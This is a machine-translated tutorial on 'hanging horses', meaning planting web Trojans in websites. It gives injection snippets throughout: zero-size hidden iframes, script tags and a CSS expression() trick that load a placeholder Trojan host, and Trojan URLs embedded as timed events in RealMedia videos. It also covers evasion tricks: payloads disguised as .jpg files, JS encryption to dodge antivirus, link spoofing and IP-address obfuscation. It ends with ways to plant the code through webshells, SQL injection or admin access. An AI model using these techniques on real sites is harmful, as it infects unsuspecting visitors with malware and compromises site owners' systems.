Web page hanging horse method and skill big summary

1, the N-way of hanging horses
　　 (1) HTML hanging Horse method.
The general HTML method of hanging a horse is to insert an IFRAME statement in the Web page, like <iframe src=http://www.xxx.com/horse.html width=0 height=0></iframe>. Check whether the site is hanging, usually to find out the keyword iframe.
　　 (2) to hide a little more is JS hanging horse.
Like the original page written in the <script Str=http://www.xxx.com/horse.js></script>,horse JS is generally document.write (' http:\/\/ Www.xxx.com\/horse.html ';, or a professional notation is Top.document.body.innerHTML = Top.document.body.innerHTML + ' \r\n< Inframe src= "http://www.xxx.com/horse.htm/" ></iframe> ";. However, the 2nd way to note: is the original web-type to have the body tag.
(3) Hanging Horse in CSS。
This method is written in CSS:
Body {
Hytop:expression (Top.document.body.innerHTML = Top.document.body.innerHTML + ' \r\n<iframe src= "/http/ www.xxx.com/horse.html/"></iframe>");
}
Then call this CSS in the home page, similar to the code. The explanation for expression in CSDN is that IE5 and later versions support the use of expression in CSS, which is used to associate CSS properties with JavaScript expressions, where the CSS property can be either an intrinsic property of an element or a custom property. This means that the CSS property can be followed by a javasccript expression, and the value of the CSS property equals the result of the JavaScript expression calculation. In an expression, you can use the properties and methods of the element itself, or other browser objects. The expression is as if it were in a member function of the element. The whole point of explanation is that expression can introduce JS statements into the CSS, so we can use it to hang horses. However, the written statement value can be called remotely, not locally.
(4) Hanging Horse in SWF
There are some SWF-linked tools on the web that can be used to replace the SWF in the original Web page or to send the SWF to each other individually, a single page that can display a SWF page. The syntax for inserting a SWF in a Web page is generally:
<object classid=clsid:d27cdb6e-ae6d-11cf-96b8-444553540000 codebase=http://download.macromedia.com/pub/ shockwave/cabs/flash/swflash.cab#version=5.0.0.0 width=760 name=quality value=high> <EMBED src= "/http www.7747.net/xxx.swf "Quality=high pluginspage=http://www.macromedia.com/shockwave/download/index.cgi? P1_prod_version=shockwaveflash Type=application/x-shockwave-flash width=760 height=60></embed></ Object>
(5) Hanging Horse in av file
The required tool is RealMedia Editor, open the tool, then select File-open Real media file, and then select the video file that needs to be edited, in the format of RealOne Company's file with RM or rmvb extension. Next, create a new text and enter the U 00:00:10:0 00:00:30.0&&_rpexternal&&http://www.xxx.com/horse.htm
(00:00:10.0 is the time of the first event, here is to let the computer pop-up page; 00:00:30.0 again, this is the second time, the 0:0 30th second 0 subtle when the window pops up, and the next URL address is the connection to the specified Trojan address. )
After you have entered and saved, select Tools-merge events to import the text you just made. When the merge is complete, select "Text"-"Save real file as" to save it.
Finally, the generated video file is published online, when the other side of the view will be connected to your designated Trojan address.
2. Tips for hanging horses
The first requirement of hanging horse is concealment, so the time of hanging can be long. Like in SWF, JS, RM hanging horse is relatively hidden, but can also use some skills.
(1) remote arbitrary suffix to execute HTML
You can put horse.html into a suffix like horse.jpg, and then write <iframe src=/uploadfile/200902/20090220105353594.jpg width=0 height=0> </iframe>. JS can also, statements for <script Src=/uploadfile/200902/20090220105353594.jpg></script&gt, and even JS do not suffix names can.
(2) JS encryption
In order to protect the Web Trojan code, can be the JS content encryption, but also to avoid the role of killing soft. If the Encode encryption method is used, the encrypted JS Call statement is used. In addition to this method, there are many more ways!
(3) Transformation of URLs
There are also many ways to deform URLs, such as converting a URL's 16 binary to encod encoding. If it involves URL spoofing more, but most of the URL spoofing, like the use of @, IE has patched. But now a loophole still works, the code is as follows:
<a id= "Czy" href= "http://www.baidu.com" ></a>
<div>
<a href= "http://www.google.cn" target= "_blank" >
<table>
<caption>
<a href= "http://www.google.cn" target= "_blank" >
<label for= "Czy" >
<u style= "Cursor:pointer:color:blue" >
Google</u>
</label></a></caption></table></a></div>
After saving the code as a webpage, when the mouse moves to google this link, the IE status bar shows http://www.google.cn, but after clicking on the link, it opens the http://www.baidu.com website. If your web horse can be accessed with an IP address, the IP address can also be converted. IP like 127.0.0.1 can also become 2130706433, 0x7f.0x00.0x00.0x01, 0177.0000.0000.0001 and so on, this is only 8 binary, 10, 16 binary, the conversion.
3, how can I hang to the horse
If you get the Webshell, it's easy to hang a horse. However, if the injection point has UPDATE permission, we can look up the call link of a news in the first page, then update the database to achieve our goal. If I can get into the background, I can write my own Trojan code in some announcements (but don't disturb the code logic in the foreground HTML source file).